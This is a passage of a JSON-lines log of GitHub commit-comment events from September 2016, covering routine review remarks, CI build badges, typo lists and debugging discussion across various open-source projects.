Badge](http://img.shields.io/badge/coverage%20status-35.98%25-green.svg)</a>\n"}},"created_at":"2016-09-02T21:54:19Z"}
{"id":"4510894453","type":"CommitCommentEvent","actor":{"login":"drawks"},"repo":{"name":"drawks/go-carbon"},"payload":{"comment":{"id":18887293,"position":4,"line":288,"path":"cache/carbonlink.go","commit_id":"cc18aee8693ec2d97a230dba6a1f418620176d07","created_at":"2016-09-02T21:55:40Z","updated_at":"2016-09-02T21:55:40Z","body":"It isn't a string, it is a dict. I tested this with a python pickle client and everything decodes as expected."}},"created_at":"2016-09-02T21:55:40Z"}
{"id":"4510895544","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18887297,"position":null,"line":null,"path":null,"commit_id":"a9514f30aa56490fe49b2010e28a25144050723b","created_at":"2016-09-02T21:55:56Z","updated_at":"2016-09-02T21:55:56Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1186 of 1186 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a9514f30aa56490fe49b2010e28a25144050723b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a9514f30aa56490fe49b2010e28a25144050723b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a9514f30aa56490fe49b2010e28a25144050723b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.98%25-green.svg)</a>\n"}},"created_at":"2016-09-02T21:55:56Z"}
{"id":"4510897581","type":"CommitCommentEvent","actor":{"login":"alexander-mead"},"repo":{"name":"cmbant/CAMB"},"payload":{"comment":{"id":18887303,"position":null,"line":null,"path":null,"commit_id":"3018e4b073afb4cd1038e6110417321dbec85d2e","created_at":"2016-09-02T21:56:31Z","updated_at":"2016-09-02T21:56:31Z","body":"Small update on this. It seems to be the first OMP loop that is causing the problem. The one that surrounds the calls to 'halomod', rather than the one that surrounds the calls to the sigma(R) function, even though it is the sigma(R) function that hangs when the problem occurs. This seems very strange to me."}},"created_at":"2016-09-02T21:56:31Z"}
{"id":"4510900161","type":"CommitCommentEvent","actor":{"login":"vpahwa"},"repo":{"name":"acm-uiuc/rp2016"},"payload":{"comment":{"id":18887311,"position":null,"line":null,"path":null,"commit_id":"3b47df068a25a18807048f6af5a1b561e2495fe0","created_at":"2016-09-02T21:57:17Z","updated_at":"2016-09-02T21:57:17Z","body":"Another heads up, this line is missing from Ben Jun's bio: Ben was co-founder and CTO of Cryptography Research, which provides core security technologies for payments, smartphones, digital content, and the manufacturing supply chain.  His security components have shipped in over 25 billion consumer devices. Cryptography Research was acquired by Rambus for $340M in 2011. It's after the sentence that ends in \"...Yelp, Affirm and Glow\"."}},"created_at":"2016-09-02T21:57:17Z"}
{"id":"4510900831","type":"CommitCommentEvent","actor":{"login":"rafanami"},"repo":{"name":"pentateu/react-native-mobix-relay-apolo"},"payload":{"comment":{"id":18887313,"position":5,"line":5,"path":"graphql-server/index.js","commit_id":"ac90f295bbcaf91a315faec791ae3413610160fd","created_at":"2016-09-02T21:57:29Z","updated_at":"2016-09-02T21:57:29Z","body":"This part is to require the raw data that we're using - for simplicity, using a json file"}},"created_at":"2016-09-02T21:57:29Z"}
{"id":"4510901302","type":"CommitCommentEvent","actor":{"login":"vshcherb"},"repo":{"name":"osmandapp/Osmand"},"payload":{"comment":{"id":18887315,"position":null,"line":null,"path":null,"commit_id":"3d13b0ba9d8a51c53cc9ed65f61292900e606564","created_at":"2016-09-02T21:57:38Z","updated_at":"2016-09-02T21:57:38Z","body":"Compilation problem"}},"created_at":"2016-09-02T21:57:38Z"}
{"id":"4510904746","type":"CommitCommentEvent","actor":{"login":"ljharb"},"repo":{"name":"ljharb/eslint"},"payload":{"comment":{"id":18887322,"position":23,"line":94,"path":"lib/rules/max-statements-per-line.js","commit_id":"8f452284dcf94aafcbddce870b91eba9c3dea26b","created_at":"2016-09-02T21:58:36Z","updated_at":"2016-09-02T21:58:36Z","body":"https://github.com/eslint/eslint/pull/7044"}},"created_at":"2016-09-02T21:58:36Z"}
{"id":"4510905882","type":"CommitCommentEvent","actor":{"login":"drawks"},"repo":{"name":"drawks/go-carbon"},"payload":{"comment":{"id":18887324,"position":4,"line":288,"path":"cache/carbonlink.go","commit_id":"cc18aee8693ec2d97a230dba6a1f418620176d07","created_at":"2016-09-02T21:58:55Z","updated_at":"2016-09-02T21:58:55Z","body":"```\r\n>>> conn = socket.create_connection(('localhost',7002))\r\n>>> conn.send(message)\r\n44\r\n>>> res = conn.recv(1024)\r\n>>> res\r\n'\\x00\\x00\\x00.\\x80\\x02}q\\x00U\\x05errorq\\x01U\\x1aInvalid request type \"foo\"q\\x02s.'\r\n>>> pickle.loads(res[4:])\r\n{'error': 'Invalid request type \"foo\"'}\r\n```"}},"created_at":"2016-09-02T21:58:55Z"}
{"id":"4510905946","type":"CommitCommentEvent","actor":{"login":"rafanami"},"repo":{"name":"pentateu/react-native-mobix-relay-apolo"},"payload":{"comment":{"id":18887325,"position":5,"line":5,"path":"graphql-server/index.js","commit_id":"ac90f295bbcaf91a315faec791ae3413610160fd","created_at":"2016-09-02T21:58:56Z","updated_at":"2016-09-02T21:58:56Z","body":"For the sake of simplicity, using a plain json file as the raw data for this example"}},"created_at":"2016-09-02T21:58:56Z"}
{"id":"4510907900","type":"CommitCommentEvent","actor":{"login":"rafanami"},"repo":{"name":"pentateu/react-native-mobix-relay-apolo"},"payload":{"comment":{"id":18887328,"position":14,"line":14,"path":"graphql-server/index.js","commit_id":"ac90f295bbcaf91a315faec791ae3413610160fd","created_at":"2016-09-02T21:59:29Z","updated_at":"2016-09-02T21:59:29Z","body":"Defining the User Type based on simple GraphQL"}},"created_at":"2016-09-02T21:59:29Z"}
{"id":"4510912580","type":"CommitCommentEvent","actor":{"login":"rafanami"},"repo":{"name":"pentateu/react-native-mobix-relay-apolo"},"payload":{"comment":{"id":18887339,"position":31,"line":31,"path":"graphql-server/index.js","commit_id":"ac90f295bbcaf91a315faec791ae3413610160fd","created_at":"2016-09-02T22:00:43Z","updated_at":"2016-09-02T22:00:43Z","body":"Defining the Schema. The \"mapping\" between the data transformation from the source to the end query result is the resolve function. We'll see how different it is when we have the Apollo version up and running."}},"created_at":"2016-09-02T22:00:43Z"}
{"id":"4510917143","type":"CommitCommentEvent","actor":{"login":"TheMatrixShibe"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18887347,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-02T22:02:06Z","updated_at":"2016-09-02T22:02:06Z","body":"Great fucking job."}},"created_at":"2016-09-02T22:02:06Z"}
{"id":"4510919156","type":"CommitCommentEvent","actor":{"login":"anjohnson"},"repo":{"name":"epics-modules/ipac"},"payload":{"comment":{"id":18887349,"position":7,"line":32,"path":"drvIpac/ipacRelease.html","commit_id":"ad073f8af041452acf102d840a599397521b8e2c","created_at":"2016-09-02T22:02:42Z","updated_at":"2016-09-02T22:02:42Z","body":"Looks great. One last request, please make this URL into a link (the link text should say something like \"in the xxx module Wiki\")."}},"created_at":"2016-09-02T22:02:42Z"}
{"id":"4510923354","type":"CommitCommentEvent","actor":{"login":"Luisafrc"},"repo":{"name":"carlosbalamba/MIKEBOL"},"payload":{"comment":{"id":18887351,"position":null,"line":null,"path":null,"commit_id":"b609a9ac9fe48605bd793ce75b5467562901beea","created_at":"2016-09-02T22:03:57Z","updated_at":"2016-09-02T22:03:57Z","body":"Diagrama de Despliegue modificado.\r\n![distribucionmk jpg](https://cloud.githubusercontent.com/assets/20103809/18219431/2d58a4ca-712f-11e6-9949-e758eae85fe1.png)\r\n"}},"created_at":"2016-09-02T22:03:57Z"}
{"id":"4510924036","type":"CommitCommentEvent","actor":{"login":"dacap"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18887357,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-02T22:04:10Z","updated_at":"2016-09-02T22:04:10Z","body":"Sorry @TheMatrixShibe, we have a [code of conduct too](https://github.com/aseprite/aseprite/blob/master/CODE_OF_CONDUCT.md)."}},"created_at":"2016-09-02T22:04:10Z"}
{"id":"4510937275","type":"CommitCommentEvent","actor":{"login":"kevinmichaelchen"},"repo":{"name":"TeslaGov/joan"},"payload":{"comment":{"id":18887384,"position":16,"line":16,"path":"rampart-joan-hook/src/main/java/com/teslagov/joan/rampart/JoanRampartHook.java","commit_id":"237adfb4147508a55bfedb2db44022410d964dc7","created_at":"2016-09-02T22:08:01Z","updated_at":"2016-09-02T22:08:01Z","body":"@fitzyjoe We will need an intermediate service that maps Rampart IDs (UUIDs) to Arc IDs (strings)."}},"created_at":"2016-09-02T22:08:01Z"}
{"id":"4510939703","type":"CommitCommentEvent","actor":{"login":"NPCTheSBest"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18887389,"position":null,"line":null,"path":null,"commit_id":"be5721d4dbc3def77a7e28e5d2d5b2de1805d45f","created_at":"2016-09-02T22:08:45Z","updated_at":"2016-09-02T22:08:45Z","body":"Requisition of the references to UILib..."}},"created_at":"2016-09-02T22:08:45Z"}
{"id":"4510945623","type":"CommitCommentEvent","actor":{"login":"Sataniel98"},"repo":{"name":"DRE2N/DungeonsXL"},"payload":{"comment":{"id":18887399,"position":null,"line":null,"path":null,"commit_id":"f1de40ef2f7ffeb910aa7ba340b28bf0694a51a8","created_at":"2016-09-02T22:10:29Z","updated_at":"2016-09-02T22:10:29Z","body":"Yes, it works fine. Try a 0.15-SNAPSHOT build if you'd like to test it."}},"created_at":"2016-09-02T22:10:29Z"}
{"id":"4510951448","type":"CommitCommentEvent","actor":{"login":"abienvenu"},"repo":{"name":"reinterpretcat/utymap"},"payload":{"comment":{"id":18887410,"position":null,"line":null,"path":null,"commit_id":"47314a5b182eddb8787d65334f393da73043c462","created_at":"2016-09-02T22:12:13Z","updated_at":"2016-09-02T22:12:13Z","body":"@realwindz I fixed the OSM data. The fix will work for anybody who downloads the zone. I think the key was to removed building:part=yes from the outline (which is incorrect), and put all parts and outline into a relation (which is highly recommended). I did not touch the UtyMap code."}},"created_at":"2016-09-02T22:12:13Z"}
{"id":"4510952502","type":"CommitCommentEvent","actor":{"login":"jhndnnqsc"},"repo":{"name":"jhndnnqsc/qsysplugins"},"payload":{"comment":{"id":18887411,"position":null,"line":null,"path":null,"commit_id":"04b6255667d31d7ddc5b50f19a628e2418340bda","created_at":"2016-09-02T22:12:32Z","updated_at":"2016-09-02T22:12:32Z","body":"yet another comment"}},"created_at":"2016-09-02T22:12:32Z"}
{"id":"4510954025","type":"CommitCommentEvent","actor":{"login":"ryannevell"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":18887413,"position":21,"line":688,"path":"thread_pthread.c","commit_id":"53953eee7c837541ad95e92bcda6ea3fd7f9ff34","created_at":"2016-09-02T22:13:00Z","updated_at":"2016-09-02T22:13:00Z","body":"I think that returning here can cause issues when Ruby is embedded into another processes and not running as the main thread. This return causes the bounds checks at the end of ruby_init_stack from running and detecting the \"co-routine\" case."}},"created_at":"2016-09-02T22:13:00Z"}
{"id":"4510954245","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18887414,"position":null,"line":null,"path":null,"commit_id":"a6670c1a0b8cda8235296900cff950f39f60cf4f","created_at":"2016-09-02T22:13:05Z","updated_at":"2016-09-02T22:13:05Z","body":"Might be, I'll look into it."}},"created_at":"2016-09-02T22:13:05Z"}
{"id":"4510959011","type":"CommitCommentEvent","actor":{"login":"dbradley645"},"repo":{"name":"dbradley645/Python-basic-calendar"},"payload":{"comment":{"id":18887424,"position":null,"line":null,"path":null,"commit_id":"117dd2b2bc40c106e382ded4b3b76bda3eb08968","created_at":"2016-09-02T22:14:26Z","updated_at":"2016-09-02T22:14:26Z","body":"#The program does the following:\r\n\r\n- Prints a welcome message to the user\r\n- Prompts the user to view, add, update, or delete an event on the calendar\r\n- Depending on the user's input: view, add, update, or delete an event on the calendar\r\n- The program never terminates unless the user decides to exit\r\n"}},"created_at":"2016-09-02T22:14:26Z"}
{"id":"4510959379","type":"CommitCommentEvent","actor":{"login":"durka"},"repo":{"name":"jackmott/jackmott.github.io"},"payload":{"comment":{"id":18887426,"position":65,"line":368,"path":"_posts/2016-8-30-think-before-you-parallelize.markdown","commit_id":"b9f3882f1556135db6e4a28eb1f26da6a600fbaa","created_at":"2016-09-02T22:14:34Z","updated_at":"2016-09-02T22:14:34Z","body":"Just so you know, `1.13.0-nightly` doesn't nail it down since there's one every night... the commit hash or the date will nail down the nightly version."}},"created_at":"2016-09-02T22:14:34Z"}
{"id":"4510961082","type":"CommitCommentEvent","actor":{"login":"tomspilman"},"repo":{"name":"MonoGame/MonoGame"},"payload":{"comment":{"id":18887429,"position":9,"line":219,"path":"MonoGame.Framework/Graphics/GraphicsDevice.cs","commit_id":"a21833aec8da29a7aab3dafc42d9de685a131834","created_at":"2016-09-02T22:15:06Z","updated_at":"2016-09-02T22:15:06Z","body":"That is odd... @nkast why wouldn't the build server not have caught this?  You do mean UWP apps for the new Windows 10 store?"}},"created_at":"2016-09-02T22:15:06Z"}
{"id":"4510971847","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"StephenBonikowsky/wcf"},"payload":{"comment":{"id":18887445,"position":18,"line":23,"path":"Packaging.props","commit_id":"05d8b778d51361a4a618fa23537ef8b4ecd2a42c","created_at":"2016-09-02T22:18:25Z","updated_at":"2016-09-02T22:18:25Z","body":"The reason we did it in CoreFx was to enabling shipping nuget packages out of our release branches with only bugfixes, even if there was more than one release branch that only differed in bugfixes.\r\n\r\nExample:\r\n1.0 product release ships System.Foo at version 4.0.0\r\n1.1 product release only includes bugfixes to System.Foo therefore should ship it at 4.0.1 per semantic versioning.\r\n\r\nCustomer wants a fix to 1.0 product, but doesn't want the bugfixes from 1.1.\r\n\r\nInitially we said that we'd not support this; we'd always ship the latest and it is \"highly-compatible\".  However our release folks didn't want to be painted into that corner, so we've been asked to give space for bugfix nuget packages from any release branch."}},"created_at":"2016-09-02T22:18:25Z"}
{"id":"4510972285","type":"CommitCommentEvent","actor":{"login":"Utumno"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":18887448,"position":null,"line":null,"path":null,"commit_id":"8cce8b132d4199c4d50f9a34286d907fa7746783","created_at":"2016-09-02T22:18:34Z","updated_at":"2016-09-02T22:18:34Z","body":"Essentially this is not still needed but once I commit 7z 16.02 I need it to be there"}},"created_at":"2016-09-02T22:18:34Z"}
{"id":"4510975164","type":"CommitCommentEvent","actor":{"login":"danallan"},"repo":{"name":"cs50/harvard.cs50.debug"},"payload":{"comment":{"id":18887454,"position":null,"line":null,"path":null,"commit_id":"f5dfdb881cf21f7c80853a67fcf0f2747cbd1223","created_at":"2016-09-02T22:19:28Z","updated_at":"2016-09-02T22:19:28Z","body":"Gonna go out on a limb and guess that the \"root cause\" is that this\nrequires post-shim cleanup, but there are numerous failure modes that can\noccur that allow the shim to shutdown but not perform the cleanup. Looks\nlike two possible failure modes have been identified in this thread:\n- some sort of debug50 script error allows gdb50start to be executed but\nnot the shim/cleanup. Guessing the script needs some \"set -euo pipefail\"\nlove to protect against these sorts of cases.\n- Some errant signal causes it to shut down prematurely: guessing\ndouble-ctrl-c in quick succession kills the script prematurely. Wonder if\nthere's some cleverness that can happen here by trapping SIGINT in debug50\nand performing cleanup.\n\nThe fundamental fix is hard: the UI needs to know that the shim has shut\ndown to reset its own state. One idea, which I started implementing but\nnever finished: have the UI monitor the PID that's sent to gdb50start, and\ncleanup once that stops. Will require constant polling. Maybe you can get\nSUPER clever; since the no-op shell is doing that anyway, just do cleanup\nonce it stops looping:\nhttps://github.com/cs50/harvard.cs50.debug/blob/ed963b93d81ac1d48a45909f593c05b1150713f2/debug.js#L232\n\n\nOn Fri, Sep 2, 2016 at 5:31 PM, glennholloway <notifications@github.com>\nwrote:\n\n> @kzidane <https://github.com/kzidane>, here's another way to put the\n> debugger into the state in which it needs a force stop. If I interrupt a\n> normal debug50 session by typing Control-C twice in rapid succession in\n> debug50's terminal, the chances are high that when I run debug50 again,\n> I'll see the dialog warning me that debugging is still in progress and\n> asking whether I want the existing debugging session shut down. Whether I\n> agree or cancel, the next time I try to run debug50, it just hangs.\n> Obviously, we need to find and fix the root cause, but meanwhile, it would\n> be good to be sure that your force-stop option will clean up in such a\n> situation. Could you please try it? (I'm ashamed to admit that I haven't\n> learned to test a plugin yet.)\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/cs50/harvard.cs50.debug/commit/f5dfdb881cf21f7c80853a67fcf0f2747cbd1223#commitcomment-18887070>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA1knbT5JCfiLM4v3ZWVVn9kH6gk7MZJks5qmJWogaJpZM4JzTG0>\n> .\n>\n"}},"created_at":"2016-09-02T22:19:28Z"}
{"id":"4510977532","type":"CommitCommentEvent","actor":{"login":"bositman"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18887460,"position":null,"line":null,"path":null,"commit_id":"6323268f40eceb810931efa3587d7fe1873da551","created_at":"2016-09-02T22:20:06Z","updated_at":"2016-09-02T22:20:06Z","body":"I can confirm the black skin bug is gone :) Still lots of bloom bugs but getting there (software mode seems perfect as far as I can see)"}},"created_at":"2016-09-02T22:20:06Z"}
{"id":"4510982938","type":"CommitCommentEvent","actor":{"login":"ninaholic"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18887472,"position":null,"line":null,"path":null,"commit_id":"efaab1c2f0040b0363ccd8ee76ce4f6253a46e99","created_at":"2016-09-02T22:21:48Z","updated_at":"2016-09-02T22:21:48Z","body":"Great read. Very informative! :smile:\r\n\r\nI do not have permission to do pull request in rationalise but can post typos found here:\r\n2- *Puppy\r\n7- *significant\r\n10- *referred\r\n11- *running it\r\n21- *that is in?\r\n44- *establishing\r\n45- *throughout\r\n46- *dropping *messages\r\n69- *which\r\n74- *sort out\r\n91- *significant\r\n98- *partitions\r\n104- *directory *must\r\n105- *and\r\n126- *always be?\r\n136- *specification\r\n137- *messages\r\n138- *parameter\r\n142- *after\r\n167- *contains\r\n173- *override"}},"created_at":"2016-09-02T22:21:48Z"}
{"id":"4510986040","type":"CommitCommentEvent","actor":{"login":"nijotz"},"repo":{"name":"nijotz/pixelmap"},"payload":{"comment":{"id":18887485,"position":null,"line":null,"path":null,"commit_id":"2b33e3ce285f1dad1c7d3855b8c6ddf20360a457","created_at":"2016-09-02T22:22:48Z","updated_at":"2016-09-02T22:22:48Z","body":"```\r\n   ▲\r\n▼  ▽  ▼\r\n▲ △ △ ▲\r\n  ▼ ▼\r\n```"}},"created_at":"2016-09-02T22:22:48Z"}
{"id":"4510987520","type":"CommitCommentEvent","actor":{"login":"nijotz"},"repo":{"name":"nijotz/pixelmap"},"payload":{"comment":{"id":18887487,"position":null,"line":null,"path":null,"commit_id":"2b33e3ce285f1dad1c7d3855b8c6ddf20360a457","created_at":"2016-09-02T22:23:14Z","updated_at":"2016-09-02T22:23:14Z","body":"I should put that in the docs"}},"created_at":"2016-09-02T22:23:14Z"}
{"id":"4510987765","type":"CommitCommentEvent","actor":{"login":"nijotz"},"repo":{"name":"nijotz/pixelmap"},"payload":{"comment":{"id":18887488,"position":null,"line":null,"path":null,"commit_id":"2b33e3ce285f1dad1c7d3855b8c6ddf20360a457","created_at":"2016-09-02T22:23:18Z","updated_at":"2016-09-02T22:23:18Z","body":"lol \"docs\""}},"created_at":"2016-09-02T22:23:18Z"}
{"id":"4510994077","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18887502,"position":null,"line":null,"path":null,"commit_id":"a123e6518521f3d59c628678c11031a4d2d8358c","created_at":"2016-09-02T22:25:12Z","updated_at":"2016-09-02T22:25:12Z","body":"@ramapcsx2 this one is for you :sparkles: "}},"created_at":"2016-09-02T22:25:12Z"}
{"id":"4510995529","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18887504,"position":null,"line":null,"path":null,"commit_id":"be5721d4dbc3def77a7e28e5d2d5b2de1805d45f","created_at":"2016-09-02T22:25:39Z","updated_at":"2016-09-02T22:25:39Z","body":"@NPCTheSBest \r\n1. UILib即将合并到NEWorld，结构可能会有大幅度改动\r\n2. UILib现在我还没弄懂呢……"}},"created_at":"2016-09-02T22:25:39Z"}
{"id":"4510996046","type":"CommitCommentEvent","actor":{"login":"tfitzmac"},"repo":{"name":"Azure/azure-content"},"payload":{"comment":{"id":18887505,"position":null,"line":null,"path":null,"commit_id":"71438456b9e199488ce0db5778b59eef535cfc48","created_at":"2016-09-02T22:25:49Z","updated_at":"2016-09-02T22:25:49Z","body":"@mikeblakeuk - thanks for pointing that out. I am taking a look at it."}},"created_at":"2016-09-02T22:25:49Z"}
{"id":"4511002669","type":"CommitCommentEvent","actor":{"login":"robbiecarlton"},"repo":{"name":"Hylozoic/hylo-redux"},"payload":{"comment":{"id":18887513,"position":null,"line":null,"path":null,"commit_id":"17f9081a5da659001ab53a11d8e559f30d9a30fc","created_at":"2016-09-02T22:27:53Z","updated_at":"2016-09-02T22:27:53Z","body":"@levity - pushed these style changes straight to master. Check em out if you get a chance"}},"created_at":"2016-09-02T22:27:53Z"}
{"id":"4511005670","type":"CommitCommentEvent","actor":{"login":"StephenBonikowsky"},"repo":{"name":"StephenBonikowsky/wcf"},"payload":{"comment":{"id":18887515,"position":18,"line":23,"path":"Packaging.props","commit_id":"05d8b778d51361a4a618fa23537ef8b4ecd2a42c","created_at":"2016-09-02T22:28:51Z","updated_at":"2016-09-02T22:28:51Z","body":"Ok, so for the moment I can just leave this out and things will work as they have been?"}},"created_at":"2016-09-02T22:28:51Z"}
{"id":"4511008229","type":"CommitCommentEvent","actor":{"login":"NPellet"},"repo":{"name":"cheminfo/json-chart"},"payload":{"comment":{"id":18887518,"position":null,"line":null,"path":null,"commit_id":"503c875054d8201f64cdae79e400fc304f891397","created_at":"2016-09-02T22:29:36Z","updated_at":"2016-09-02T22:29:36Z","body":"I wrote those specifications as far as I can remember. Implementation works as markers on the line serie, not implemented in the scatter serie. Ideally I wanted to use the same schema for both, but I'm open to suggestions.\r\n\r\nBut your example doesn't make any sense. You have a lot of overdefinition of the properties. The jsGraph way makes more sense, because you have a main style and then extend it with modifiers:\r\n\r\nhttp://jsgraph.org/examples/scatterseries/scatter2.js/\r\n\r\nBut once again, as you wish."}},"created_at":"2016-09-02T22:29:36Z"}
{"id":"4511008281","type":"CommitCommentEvent","actor":{"login":"junghans"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":18887519,"position":1,"line":1,"path":"sys-cluster/legion/files/legion-16.08.0-hwloc.patch","commit_id":"50d751cf3d0e5250817438bb0a5cdf89f806cb92","created_at":"2016-09-02T22:29:38Z","updated_at":"2016-09-02T22:29:38Z","body":"StanfordLegion/legion#166"}},"created_at":"2016-09-02T22:29:38Z"}
{"id":"4511008340","type":"CommitCommentEvent","actor":{"login":"hanlin-nervana"},"repo":{"name":"NervanaSystems/aeon"},"payload":{"comment":{"id":18887520,"position":10,"line":20,"path":"doc/source/etl_video.rst","commit_id":"56df337b261e4857846a262d3a7dc2fca5c35262","created_at":"2016-09-02T22:29:39Z","updated_at":"2016-09-02T22:29:39Z","body":"Is this true? The `frame` params supports cropping, scaling, etc. for handling different image sizes -- are those all supported in video?\r\n\r\nAlso, below you mention that shorter clips are zero padded, suggestion that the videos don't have to be of equal length?\r\n"}},"created_at":"2016-09-02T22:29:39Z"}
{"id":"4511008563","type":"CommitCommentEvent","actor":{"login":"junghans"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":18887521,"position":1,"line":1,"path":"sys-cluster/legion/files/legion-16.08.0-multilib.patch","commit_id":"50d751cf3d0e5250817438bb0a5cdf89f806cb92","created_at":"2016-09-02T22:29:43Z","updated_at":"2016-09-02T22:29:43Z","body":"StanfordLegion/legion#167"}},"created_at":"2016-09-02T22:29:43Z"}
{"id":"4511009674","type":"CommitCommentEvent","actor":{"login":"hanlin-nervana"},"repo":{"name":"NervanaSystems/aeon"},"payload":{"comment":{"id":18887523,"position":16,"line":26,"path":"doc/source/etl_video.rst","commit_id":"56df337b261e4857846a262d3a7dc2fca5c35262","created_at":"2016-09-02T22:30:04Z","updated_at":"2016-09-02T22:30:04Z","body":"Some information on what this preprocessing does would be useful."}},"created_at":"2016-09-02T22:30:04Z"}
{"id":"4511010017","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18887525,"position":null,"line":null,"path":null,"commit_id":"6323268f40eceb810931efa3587d7fe1873da551","created_at":"2016-09-02T22:30:12Z","updated_at":"2016-09-02T22:30:12Z","body":"Yes the game does shit with the depth buffer and others crazyness. The only common point between GPU and GS is the first letter !"}},"created_at":"2016-09-02T22:30:12Z"}
{"id":"4511012819","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"StephenBonikowsky/wcf"},"payload":{"comment":{"id":18887529,"position":18,"line":23,"path":"Packaging.props","commit_id":"05d8b778d51361a4a618fa23537ef8b4ecd2a42c","created_at":"2016-09-02T22:31:02Z","updated_at":"2016-09-02T22:31:02Z","body":"Yep, you can decide on this separately.  When you do decide you'll need to update the index."}},"created_at":"2016-09-02T22:31:02Z"}
{"id":"4511013221","type":"CommitCommentEvent","actor":{"login":"junghans"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":18887530,"position":null,"line":null,"path":null,"commit_id":"50d751cf3d0e5250817438bb0a5cdf89f806cb92","created_at":"2016-09-02T22:31:10Z","updated_at":"2016-09-02T22:31:10Z","body":"@tuxfan and @ipdemes: And that is how you get legion in Gentoo Linux ;-)"}},"created_at":"2016-09-02T22:31:10Z"}
{"id":"4511013257","type":"CommitCommentEvent","actor":{"login":"phated"},"repo":{"name":"erikkemperman/vinyl-prepare"},"payload":{"comment":{"id":18887531,"position":30,"line":34,"path":"index.js","commit_id":"e19492906f1d0de40412cefb6cd4589720d06ecf","created_at":"2016-09-02T22:31:11Z","updated_at":"2016-09-02T22:31:11Z","body":"I don't think symlink resolution goes in glob-stream because it only deals with file paths.  The way vinyl-fs uses the path is based on the different options in the vinyl-fs and it might read the file or not, etc."}},"created_at":"2016-09-02T22:31:11Z"}
{"id":"4511015998","type":"CommitCommentEvent","actor":{"login":"sagarkchitnis"},"repo":{"name":"sagarkchitnis/contrail-third-party"},"payload":{"comment":{"id":18887535,"position":null,"line":null,"path":null,"commit_id":"cf0dd47b51daa865656349e8be656d049e1ef834","created_at":"2016-09-02T22:32:06Z","updated_at":"2016-09-02T22:32:06Z","body":"https://bugs.launchpad.net/opencontrail/+bug/1617479\r\nupdate all projects that were hosted on googlecode to use github.com:Juniper/contrail-third-party"}},"created_at":"2016-09-02T22:32:06Z"}
{"id":"4511018885","type":"CommitCommentEvent","actor":{"login":"apark263"},"repo":{"name":"NervanaSystems/aeon"},"payload":{"comment":{"id":18887543,"position":10,"line":20,"path":"doc/source/etl_video.rst","commit_id":"56df337b261e4857846a262d3a7dc2fca5c35262","created_at":"2016-09-02T22:32:58Z","updated_at":"2016-09-02T22:32:58Z","body":"sorry, that was my error.  it's actually neon that requires uniform length clips with equal frame dimensions\r\n\r\naeon can handle variable length, but requires that they are MJPEG encoded.  "}},"created_at":"2016-09-02T22:32:58Z"}
{"id":"4511021002","type":"CommitCommentEvent","actor":{"login":"junwan6"},"repo":{"name":"ccle/moodle-mod_turnitintooltwo"},"payload":{"comment":{"id":18887547,"position":null,"line":null,"path":null,"commit_id":"dd79063580558bf89168489d27a9e4b99048a206","created_at":"2016-09-02T22:33:40Z","updated_at":"2016-09-02T22:33:40Z","body":"@rlorenzo This is the branch with only the upgrades."}},"created_at":"2016-09-02T22:33:40Z"}
{"id":"4511022442","type":"CommitCommentEvent","actor":{"login":"ivandrofly"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":18887548,"position":null,"line":null,"path":null,"commit_id":"f6e917367921d0f459c7b021996d77979e83a8b6","created_at":"2016-09-02T22:34:10Z","updated_at":"2016-09-02T22:34:10Z","body":"@marb99 ?\r\n\r\nWhat is the message after the crash?"}},"created_at":"2016-09-02T22:34:10Z"}
